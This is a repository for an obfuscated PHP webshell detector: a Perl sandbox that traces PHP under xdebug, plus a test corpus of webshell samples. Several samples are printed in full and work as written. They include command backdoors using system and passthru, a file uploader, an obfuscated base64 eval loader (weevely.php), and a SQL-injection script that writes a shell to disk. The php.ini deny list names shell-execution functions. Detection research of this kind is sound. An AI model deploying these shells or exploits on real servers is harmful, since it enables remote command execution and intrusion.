├── .gitignore
├── README.md
├── t
    └── malware
    │   ├── eval.php
    │   ├── test.php
    │   ├── 1.php
    │   ├── 0.php
    │   ├── 10.php
    │   ├── 11.php
    │   ├── 19.php
    │   ├── 20.php
    │   ├── 22.php
    │   ├── 23.php
    │   ├── 24.php
    │   ├── 25.php
    │   ├── 26.php
    │   ├── 32.php
    │   ├── 33.php
    │   ├── 37.php
    │   ├── 38.php
    │   ├── 4.php
    │   ├── 45.php
    │   ├── 46.php
    │   ├── 47.php
    │   ├── 48.php
    │   ├── 49.php
    │   ├── 50.php
    │   ├── 52.php
    │   ├── 53.php
    │   ├── 54.php
    │   ├── 6.php
    │   ├── 62.php
    │   ├── 69.php
    │   ├── 71.php
    │   ├── 72.php
    │   ├── 75.php
    │   ├── 82.php
    │   ├── 83.php
    │   ├── 89.php
    │   ├── 92.php
    │   ├── 93.php
    │   ├── 94.php
    │   ├── 95.php
    │   ├── 109.php
    │   ├── 112.php
    │   ├── 113.php
    │   ├── 114.php
    │   ├── 121.php
    │   ├── b374k.php.zip
    │   ├── 100.php
    │   ├── 102.php
    │   ├── 91.php
    │   ├── weevely.php
    │   ├── 86.php
    │   ├── 81.php
    │   ├── 41.php
    │   ├── 42.php
    │   ├── 118.php
    │   ├── 51.php
    │   ├── 77.php
    │   ├── 78.php
    │   ├── 58.php
    │   ├── 117.php
    │   ├── 103.php
    │   ├── 104.php
    │   ├── 29.php
    │   ├── 30.php
    │   ├── 80.php
    │   ├── 43.php
    │   ├── 14.php
    │   ├── 111.php
    │   ├── 21.php
    │   ├── 5.php
    │   ├── 8.php
    │   ├── 90.php
    │   ├── 98.php
    │   ├── 15.php
    │   ├── 7.php
    │   └── 55.php
├── server
    ├── template
    │   ├── append.php
    │   ├── prepend.php
    │   ├── custom-php.ini
    │   ├── iptables.rule
    │   └── apache2.conf
    ├── t
    │   ├── read_yaml.pl
    │   └── make_yaml.pl
    ├── run.pl
    └── sandbox.psgi
├── doc
    ├── PepboTech.odp
    ├── HostingCasual.odp
    └── HostingCasual.pdf
├── lib
    └── K0U5UK3
    │   ├── OPWD.pm
    │   ├── Error.pm
    │   └── Util.pm
├── settings.yaml
└── client
    └── obscan.pl


/.gitignore:
--------------------------------------------------------------------------------
1 | server/logs/*
2 | tags
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # obfusucated-php-detector
2 | 


--------------------------------------------------------------------------------
/t/malware/eval.php:
--------------------------------------------------------------------------------
1 | <?php
2 |    eval("echo hello;");
3 | ?>
4 | 


--------------------------------------------------------------------------------
/server/template/append.php:
--------------------------------------------------------------------------------
1 | <?php
2 | xdebug_stop_trace();
3 | ?>
4 | 


--------------------------------------------------------------------------------
/t/malware/test.php:
--------------------------------------------------------------------------------
1 | <?php
2 |    eval('echo \'hello 
3 | 
4 | 
5 | world\';');
6 | ?>
7 | 
8 | 


--------------------------------------------------------------------------------
/t/malware/1.php:
--------------------------------------------------------------------------------
1 | <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
2 | 


--------------------------------------------------------------------------------
/t/malware/0.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/0.php


--------------------------------------------------------------------------------
/t/malware/10.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/10.php


--------------------------------------------------------------------------------
/t/malware/11.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/11.php


--------------------------------------------------------------------------------
/t/malware/19.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/19.php


--------------------------------------------------------------------------------
/t/malware/20.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/20.php


--------------------------------------------------------------------------------
/t/malware/22.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/22.php


--------------------------------------------------------------------------------
/t/malware/23.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/23.php


--------------------------------------------------------------------------------
/t/malware/24.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/24.php


--------------------------------------------------------------------------------
/t/malware/25.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/25.php


--------------------------------------------------------------------------------
/t/malware/26.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/26.php


--------------------------------------------------------------------------------
/t/malware/32.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/32.php


--------------------------------------------------------------------------------
/t/malware/33.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/33.php


--------------------------------------------------------------------------------
/t/malware/37.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/37.php


--------------------------------------------------------------------------------
/t/malware/38.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/38.php


--------------------------------------------------------------------------------
/t/malware/4.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/4.php


--------------------------------------------------------------------------------
/t/malware/45.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/45.php


--------------------------------------------------------------------------------
/t/malware/46.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/46.php


--------------------------------------------------------------------------------
/t/malware/47.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/47.php


--------------------------------------------------------------------------------
/t/malware/48.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/48.php


--------------------------------------------------------------------------------
/t/malware/49.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/49.php


--------------------------------------------------------------------------------
/t/malware/50.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/50.php


--------------------------------------------------------------------------------
/t/malware/52.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/52.php


--------------------------------------------------------------------------------
/t/malware/53.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/53.php


--------------------------------------------------------------------------------
/t/malware/54.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/54.php


--------------------------------------------------------------------------------
/t/malware/6.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/6.php


--------------------------------------------------------------------------------
/t/malware/62.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/62.php


--------------------------------------------------------------------------------
/t/malware/69.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/69.php


--------------------------------------------------------------------------------
/t/malware/71.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/71.php


--------------------------------------------------------------------------------
/t/malware/72.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/72.php


--------------------------------------------------------------------------------
/t/malware/75.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/75.php


--------------------------------------------------------------------------------
/t/malware/82.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/82.php


--------------------------------------------------------------------------------
/t/malware/83.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/83.php


--------------------------------------------------------------------------------
/t/malware/89.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/89.php


--------------------------------------------------------------------------------
/t/malware/92.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/92.php


--------------------------------------------------------------------------------
/t/malware/93.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/93.php


--------------------------------------------------------------------------------
/t/malware/94.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/94.php


--------------------------------------------------------------------------------
/t/malware/95.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/95.php


--------------------------------------------------------------------------------
/doc/PepboTech.odp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/doc/PepboTech.odp


--------------------------------------------------------------------------------
/t/malware/109.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/109.php


--------------------------------------------------------------------------------
/t/malware/112.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/112.php


--------------------------------------------------------------------------------
/t/malware/113.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/113.php


--------------------------------------------------------------------------------
/t/malware/114.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/114.php


--------------------------------------------------------------------------------
/t/malware/121.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/121.php


--------------------------------------------------------------------------------
/doc/HostingCasual.odp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/doc/HostingCasual.odp


--------------------------------------------------------------------------------
/doc/HostingCasual.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/doc/HostingCasual.pdf


--------------------------------------------------------------------------------
/t/malware/b374k.php.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0u5uk3/obfuscated-php-webshell-detector/HEAD/t/malware/b374k.php.zip


--------------------------------------------------------------------------------
/lib/K0U5UK3/OPWD.pm:
--------------------------------------------------------------------------------
 1 | package K0U5UK3::OPWD;
 2 | require Exporter;
 3 | use Exporter;
 4 | @ISA = qw(Exporter);
 5 | @EXPORT_OK = qw();
 6 | use strict;
 7 | use warnings;
 8 | 
 9 | 
10 | 
11 | 1;
12 | 
13 | 


--------------------------------------------------------------------------------
/server/t/read_yaml.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | use strict;
 3 | use warnings;
 4 | use Data::Dumper;
 5 | use YAML qw(LoadFile);
 6 | 
 7 | my $hash =  LoadFile("./observ.yaml");
 8 | 
 9 | print Dumper($hash);
10 | 


--------------------------------------------------------------------------------
/server/template/prepend.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $POD_TRACELOG_DIR = "{$TRACELOG_DIR}";
3 | $POD_EXEC_FILENAME = basename($_SERVER['PHP_SELF']);
4 | xdebug_start_trace( "$POD_TRACELOG_DIR/$POD_EXEC_FILENAME" );
5 | $POD_TRACELOG_FILENAME = "$POD_TRACELOG_DIR/$POD_EXEC_FILENAME".".xt";
6 | ?>
7 | 


--------------------------------------------------------------------------------
/server/t/make_yaml.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | use strict;
 3 | use warnings;
 4 | use YAML qw(Dump Bless);
 5 | 
 6 | my $hash = {
 7 |    'WEBROOT'  => "/tmp/obfusucated-php-detector/webroot/",
 8 |    'TRACELOG' => "/tmp/obfusucated-php-detector/tracelog/",
 9 | };
10 | 
11 | print Dump $hash;
12 | 
13 | 
14 | 


--------------------------------------------------------------------------------
/t/malware/100.php:
--------------------------------------------------------------------------------
 1 | <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
 2 | 
 3 | <?php
 4 | 
 5 | if(isset($_REQUEST['cmd'])){
 6 |         echo "<pre>";
 7 |         $cmd = ($_REQUEST['cmd']);
 8 |         system($cmd);
 9 |         echo "</pre>";
10 |         die;
11 | }
12 | 
13 | ?>
14 | 
15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
16 | 
17 | <!--    http://michaeldaw.org   2006    -->
18 | 


--------------------------------------------------------------------------------
/t/malware/102.php:
--------------------------------------------------------------------------------
 1 | 
 2 | <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
 3 | 
 4 | <?php
 5 | 
 6 | if(isset($_REQUEST['cmd'])){
 7 |         echo "<pre>";
 8 |         $cmd = ($_REQUEST['cmd']);
 9 |         system($cmd);
10 |         echo "</pre>";
11 |         die;
12 | }
13 | 
14 | ?>
15 | 
16 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
17 | 
18 | <!--    http://michaeldaw.org   2006    -->
19 | 
20 | 


--------------------------------------------------------------------------------
/server/template/custom-php.ini:
--------------------------------------------------------------------------------
 1 | auto_prepend_file = {$PREPEND_PHP}
 2 | auto_append_file = {$APPEND_PHP}
 3 | xdebug.collect_return = 1
 4 | xdebug.collect_params = 3
 5 | xdebug.collect_assignments = 1
 6 | xdebug.var_display_max_data = 100000
 7 | xdebug.var_display_max_depth = 100000
 8 | xdebug.trace_format = 1
 9 | memory_limit = 256M
10 | disable_functions = system, exec, passthru, fopen, file_put_contents, shell_exec, popen, proc_open, pcntl_exec, mkdir, rename, copy, unlink, touch, chmod
11 | 


--------------------------------------------------------------------------------
/t/malware/91.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | /*
 3 | Ru24PostWebShell
 4 | Writed by DreAmeRz
 5 | 
 6 | http://www.ru24-team.net
 7 | */
 8 | error_reporting(0);
 9 | $function=passthru; // system, exec, cmd
10 | echo "<html>
11 | <head>
12 | <title>Ru24PostWebShell - ".$_POST['cmd']."</title>
13 | <meta http-equiv='pragma' content='no-cache'>
14 | </head><body>";
15 | echo "<form method=post>";
16 | echo "<input type=text name=cmd size=85>";
17 | echo "</form>";
18 | echo "<pre>";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."</pre></body></html>";
21 | 
22 | 
23 | ?>
24 | 


--------------------------------------------------------------------------------
/server/template/iptables.rule:
--------------------------------------------------------------------------------
 1 | *filter
 2 | :INPUT DROP [0:0]
 3 | :FORWARD DROP [0:0]
 4 | :OUTPUT DROP [0:0]
 5 | 
 6 | -A INPUT -i lo -j ACCEPT
 7 | -A OUTPUT -o lo -j ACCEPT
 8 | 
 9 | -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
10 | -A INPUT -p icmp -j ACCEPT
11 | -A INPUT -i lo -j ACCEPT
12 | -A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT
13 | -A INPUT -m state --state NEW -m tcp -p tcp --dport {$SANDBOX_HTTPD_PORT} -j ACCEPT
14 | 
15 | -A OUTPUT -p tcp -m state --state ESTABLISHED --sport 22 -j ACCEPT
16 | -A OUTPUT -p tcp -m state --state ESTABLISHED --sport {$SANDBOX_HTTPD_PORT} -j ACCEPT
17 | 
18 | COMMIT
19 | 


--------------------------------------------------------------------------------
/t/malware/weevely.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $hkts = str_replace("y","","ystyry_yryepylyayce");
3 | $mxzv="JdhGM9J2dhNvdW50JzskYT0kdhX0dhNPT0tJRTtpZihyZXNldCgdhkYSk9PSdwYScgJiYgJGMoJGEdhpPjMpdheyR";
4 | $wrgj="CBqb2luKdhGFycmF5Xdh3NsaWNlKCdhRhdhLCRjKCRhdhKS0dhzKSkdhpKSdhk7ZWNdhobyAnPC8dhnLiRrLic+Jzt9";
5 | $rzax="rdhPSdzcdh3cwcmQnO2VjdhaGdh8gJzwnLiRrLidhc+JztldmFsKdhGJhc2U2dhNF9kdhZWNvZGUod";
6 | $czdj="hcHJlZdh19yZXBsdhYWNlKGFdhydhcmF5KCcvW1dh5cdz1cc10vJydhwnL1xzLycpLCBhcnJheSgdhnJywnKycpL";
7 | $bcrs = $hkts("k", "", "kbkakske6k4k_dkekckodke");
8 | $juqj = $hkts("j","","jcrjejajtje_fjujnjctjiojn");
9 | $boxz = $juqj('', $bcrs($hkts("dh", "", $mxzv.$rzax.$czdj.$wrgj))); $boxz();


--------------------------------------------------------------------------------
/server/template/apache2.conf:
--------------------------------------------------------------------------------
 1 | ServerName localhost
 2 | ServerRoot {$APACHE_DIR}
 3 | PidFile httpd.pid
 4 | User {$APACHE_USER}
 5 | Group {$APACHE_GROUP}
 6 | ErrorLog {$APACHE_ERR_LOGFILE}
 7 | Listen {$APACHE_PORT}
 8 | 
 9 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
10 | 
11 | <Directory {$APACHE_DIR}>
12 |     Options Indexes FollowSymLinks
13 |     AllowOverride None
14 |     Require all granted
15 | </Directory>
16 | 
17 | IncludeOptional mods-enabled/*.load
18 | IncludeOptional mods-enabled/*.conf
19 | ServerAdmin webmaster@localhost
20 | DocumentRoot {$APACHE_DOCUMENT_ROOT}
21 | ErrorLog {$APACHE_ERR_LOGFILE}
22 | CustomLog {$APACHE_ACCESS_LOGFILE} combined
23 | 
24 | <Location /sandbox/>
25 |    SetHandler perl-script
26 |    PerlResponseHandler Plack::Handler::Apache2
27 |    PerlSetVar psgi_app {$SANDBOX_PSGI}
28 | </Location>
29 | 
30 | <IfModule php5_module>
31 |     PHPINIDir "{$PHP_INI_FILE}"
32 | </IfModule>
33 | 
34 | 


--------------------------------------------------------------------------------
/t/malware/86.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <div align="left"><font size="1">Input command :</font></div>
 4 | <form name="cmd" method="POST" enctype="multipart/form-data">
 5 | <input type="text" name="cmd" size="30" class="input"><br>
 6 | <pre>
 7 | <?php
 8 | if ($_POST['cmd']){
 9 | $cmd = $_POST['cmd'];
10 | passthru($cmd);
11 | }
12 | ?>
13 | </pre>
14 | <hr>
15 | <div align="left"><font size="1">Uploader file :</font></div>
16 | 
17 | <?php
18 | $uploaded = $_FILES['file']['tmp_name'];
19 | if (file_exists($uploaded)) {
20 |    $pwddir = $_POST['dir'];
21 |    $real = $_FILES['file']['name'];
22 |    $dez = $pwddir."/".$real;
23 |    copy($uploaded, $dez);
24 |    echo "FILE UPLOADED TO $dez";
25 | }
26 | ?>     </pre>
27 | <form name="form1" method="post" enctype="multipart/form-data">
28 |  <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
29 |  <input type="submit" name="submit2" value="Upload">
30 |  <input type="file" name="file" size="15">
31 | 	  </td>
32 |     </tr>
33 | </table>
34 | </body>
35 | </html>
36 | 


--------------------------------------------------------------------------------
/lib/K0U5UK3/Error.pm:
--------------------------------------------------------------------------------
 1 | package K0U5UK3::Error;
 2 | require Exporter;
 3 | use Exporter;
 4 | @ISA = qw(Exporter);
 5 | @EXPORT_OK = qw($DEBUG $WARNING debug warning critical);
 6 | use Carp qw(carp cluck croak confess);
 7 | use strict;
 8 | use warnings;
 9 | 
10 | our $DEBUG=0;
11 | our $WARNING=0;
12 | 
13 | sub timestamp($){
14 |    my $unixtime = shift;
15 |    my ($sec, $min, $hour, $mday, $mon, 
16 |       $year, $wday, $yday, $isdst) = localtime($unixtime);
17 | 
18 |    my $fmt = "%04d/%02d/%02d(%s) %02d:%02d:%02d";
19 |    my $timestamp =  sprintf($fmt, $year+1900,$mon+1,$mday,substr(localtime, 0, 3), $hour,$min,$sec);
20 |    return $timestamp;
21 | }
22 | 
23 | # debugは単純にメッセージだけを出力する
24 | # warningはメッセージと実行行を出力する
25 | # ciriticalはメッセージと実行行を出力して終了する。もしくは$@に値をセットする
26 | sub debug($){
27 |    my $msg = shift;
28 |    my $ts = timestamp(time);
29 |    print STDERR "[DEBUG][$ts] $msg\n" if $DEBUG;
30 | }
31 | 
32 | sub warning($){
33 |    my $msg = shift;
34 |    my $ts = timestamp(time);
35 |    carp "[WARNING][$ts] $msg\n" if $WARNING;
36 | }
37 | 
38 | sub critical($){
39 |    my $msg = shift;
40 |    my $ts = timestamp(time);
41 |    croak "[CRITICAL][$ts] $msg\n";
42 | }
43 | 
44 | 1;
45 | 
46 | 


--------------------------------------------------------------------------------
/t/malware/81.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | ?>
 3 | <html>
 4 | <head>
 5 | <title>|| .::News Remote PHP Shell Injection::. ||   </title>
 6 | </head>
 7 | <body>
 8 | <header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />
 9 | <?php
10 | if (isset($_POST['url'])) {
11 | $url = $_POST['url'];
12 | $path2news = $_POST['path2news'];
13 | $outfile = $_POST ['outfile'];
14 | $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
15 | $sql = urlencode($sql);
16 | $expurl= $url."?id=".$sql ;
17 | echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
19 | }
20 | else
21 | {
22 | ?>
23 | Url to index.php: <br /> 
24 | <form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
25 | <input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
26 | Server Path to Shell: <br />
27 | Full server path to a writable file which will contain the Php Shell <br />
28 | <input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
29 | <input type = "submit" value = "Create Exploit"> <br /> <br />
30 | 
31 | 
32 | 
33 | <?php
34 | }
35 | ?>
36 | </body>
37 | </html>


--------------------------------------------------------------------------------
/lib/K0U5UK3/Util.pm:
--------------------------------------------------------------------------------
 1 | package K0U5UK3::Util;
 2 | require Exporter;
 3 | use Exporter;
 4 | use File::Path;
 5 | use Digest::MD5;
 6 | use K0U5UK3::Error qw(debug warning critical);
 7 | 
 8 | @ISA = qw(Exporter);
 9 | @EXPORT_OK = qw(read_file cleanup get_md5 concat_path init_dir);
10 | 
11 | sub read_file($){
12 |    my $file = shift;
13 |    my $text;
14 |    open my $fh, '<', $file or die "Failed read $file : $!\n";
15 |    local $/ = undef;
16 |    $text = <$fh>;
17 |    close($fh);
18 |    return $text;
19 | }
20 | 
21 | sub cleanup($){
22 |    my $file = shift;
23 |    unlink($file) or critical "Failed unlink $file : $!\n" if -f $file;
24 | }
25 | 
26 | sub get_md5($){
27 |    my $filename = shift;
28 |    open my $fh, '<', $filename or critical "Failed open $filename : $!\n";
29 |    my $md5 = Digest::MD5->new->addfile($fh)->hexdigest;
30 |    close($fh);
31 |    return $md5;
32 | }
33 | 
34 | sub concat_path{
35 |    my $concat;
36 |    my @paths = @_;
37 | 
38 |    foreach my $path (@paths){
39 |       if($path !~ /^\//){
40 |          $path = '/' . $path;
41 |       }
42 |       $concat .= $path;
43 |    }
44 | 
45 |    return $concat;
46 | }
47 | 
48 | #ディレクトリがなければ作成する
49 | #再起的に作成することもできる
50 | sub init_dir($){
51 |    my $dir = shift;
52 | 
53 |    if (!-d $dir){
54 |       mkpath $dir or critical "Failed make $dir : $!";
55 |    }
56 | }
57 | 
58 | 1;
59 | 


--------------------------------------------------------------------------------
/settings.yaml:
--------------------------------------------------------------------------------
 1 | #------------------#
 2 | # GENERAL SETTINGS #
 3 | #------------------#
 4 | SANDBOX_HOST: 157.7.190.188
 5 | SANDBOX_PORT: 9999
 6 | USE_SSL: 0
 7 | 
 8 | #------------------#
 9 | # SANDBOX SETTINGS #
10 | #------------------#
11 | 
12 | # SANDBOX_HTTPD_ENGINEはどのHTTPエンジンを使用してsandboxの解析を行うかを選択します。
13 | # 実稼働にはAPACHEを推奨します。
14 | # APACHE or PLACK or STARMAN
15 | SANDBOX_HTTPD_ENGINE: APACHE
16 | 
17 | # 解析対象のPHPスクリプトを配置するためのディレクトリを決定します。
18 | WEBROOT_DIR: /tmp/OPWD_SANDBOX/webroot/
19 | 
20 | # TRACELOGを出力するディレクトリを決定します。
21 | TRACELOG_DIR: /tmp/OPWD_SANDBOX/tracelog/
22 | 
23 | # 各種設定ファイルを格納するディレクトリを決定します。
24 | SETTING_DIR: /tmp/OPWD_SANDBOX/etc/
25 | 
26 | # ログファイル格納場所を決定します
27 | LOG_DIR: /tmp/OPWD_SANDBOX/logs/
28 | 
29 | # APACHE設定ファイル格納場所を決定します
30 | APACHE_DIR: /tmp/OPWD_SANDBOX/etc/apache2
31 | 
32 | # PLACK or STARMANをHTTP_MIDDLEWARE_ENGINEにした場合、PHPインタプリタサーバを別個に立ち上げます。
33 | PHP_BUILTIN_SERVER_HOST: 127.0.0.1
34 | PHP_BUILTIN_SERVER_PORT: 6666
35 | 
36 | # PHPインタプリタサーバが出力するログファイルを決定します
37 | PHP_BUILTIN_SERVER_LOGFILE: php_builtin_server.log
38 | 
39 | # SANDBOX上で稼働するHTTPサーバのIPを決定します。
40 | SANDBOX_HTTPD_HOST: 0.0.0.0
41 | # SANDBOX上で稼働するHTTPサーバのPORTを決定します。
42 | SANDBOX_HTTPD_PORT: 9999
43 | SANDBOX_HTTPD_LOGFILE: httpd.log
44 | SANDBOX_HTTPD_ERRFILE: httpd_err.log
45 | 
46 | # SANDBOXが解析対象PHPスクリプトをHTTP上から実行する際のTIMEOUTを決定します。
47 | SANDBOX_UA_TIMEOUT: 60
48 | 
49 | #-----------------#
50 | # CLINET SETTINGS #
51 | #-----------------#
52 | 
53 | CLIENT_UA_TIMEOUT: 60
54 | 


--------------------------------------------------------------------------------
/t/malware/41.php:
--------------------------------------------------------------------------------
 1 | <title>h4ntu shell [powered by tsoi]</title>
 2 | <?php
 3 | echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
 4 | ?>
 5 | 
 6 | <?php
 7 |   closelog( );
 8 |   $user = get_current_user( );
 9 |   $login = posix_getuid( );
10 |   $euid = posix_geteuid( );
11 |   $ver = phpversion( );
12 |   $gid = posix_getgid( );
13 |   if ($chdir == "") $chdir = getcwd( );
14 |   if(!$whoami)$whoami=exec("whoami");
15 | ?>
16 | <meta name="generator" content="Namo WebEditor v5.0">
17 | <br>
18 | <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
19 | <?php
20 |   $uname = posix_uname( );
21 |   while (list($info, $value) = each ($uname)) {
22 | ?>
23 |   <TR>
24 |     <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
25 |   </TR>
26 | <?php
27 |   }
28 | ?>
29 |   <TR>
30 | 
31 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
32 |   </TR>
33 |   <TR>
34 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
35 | 
36 |   </TR>
37 |   <TR>
38 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
39 |   </TR>  
40 |   <TR>
41 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
42 |   </TR>
43 | 
44 |   <TR>
45 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
46 |   </TR>
47 |   <TR>
48 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
49 |   </TR>
50 |   <TR>
51 | 
52 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
53 |   </TR>
54 | </TABLE>
55 | <BR>
56 | 
57 | <font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
58 | </font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
